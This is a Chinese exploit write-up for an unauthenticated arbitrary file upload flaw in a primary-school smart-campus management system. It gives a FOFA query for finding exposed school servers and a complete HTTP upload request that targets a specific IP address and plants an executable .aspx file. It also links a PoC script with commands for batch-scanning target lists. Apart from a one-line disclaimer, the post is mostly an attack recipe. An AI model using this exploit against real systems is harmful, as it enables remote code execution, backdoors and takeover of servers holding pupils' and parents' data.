【漏洞复现】某小学智慧校园信息管理系统——/PSE/Upload——文件上传

声明：本文档或演示材料仅供教育和教学目的使用，任何个人或组织使用本文档中的信息进行非法活动，均与本文档的作者或发布者无关。

---

漏洞描述

某小学智慧校园信息管理系统是新中新集团利用云服务技术，并借鉴“互联网+”模式，专为中小学校园打造的一套集学生校园安全、家校互动、校园金融以及校园一卡通为一体的基础教育信息化整体解决方案。该系统围绕基础教育信息化、智慧化建设，将线下业务和线上业务结合，为教育主管部门、校园管理者、教师、学生以及家长提供具有教务管理功能的平台化、移动化的应用系统。

某小学智慧校园信息管理系统 /PSE/Upload 接口处存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

漏洞复现

1）信息收集
fofa：body="/Login/IndexMobi"&domain="edu"

山川同一色，浩若涉大荒。

构造数据包：

POST /PSE/Upload HTTP/1.1
Host: 111.20.198.254:8030
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Type: multipart/form-data; boundary=230982304982309
Connection: close
Content-Length: 239

--230982304982309
Content-Disposition: form-data; name="file"; filename="Hello.aspx"
Content-Type: image/jpg

<%@Page Language="C#"%><%Response.Write("HelloWorldTest");System.IO.File.Delete(Request.PhysicalPath);%>
--230982304982309--

回显上传成功，访问一下上传的文件

/Upload/PrimarySchoolEnrollment/2601b03b-8da7-443a-9a9c-e18d2f2c5ac0.aspx

测试工具

https://github.com/ATonysan/poc-exp/blob/main/School_Upload_ArbiraryFileUpload.py

批量检测:
python School_Upload_ArbiraryFileUpload.py -f url.txt

单个url检测漏洞:
python School_Upload_ArbiraryFileUpload.py -u url

---

我不敢去，但必须去，有些事是必须要做的逃避不了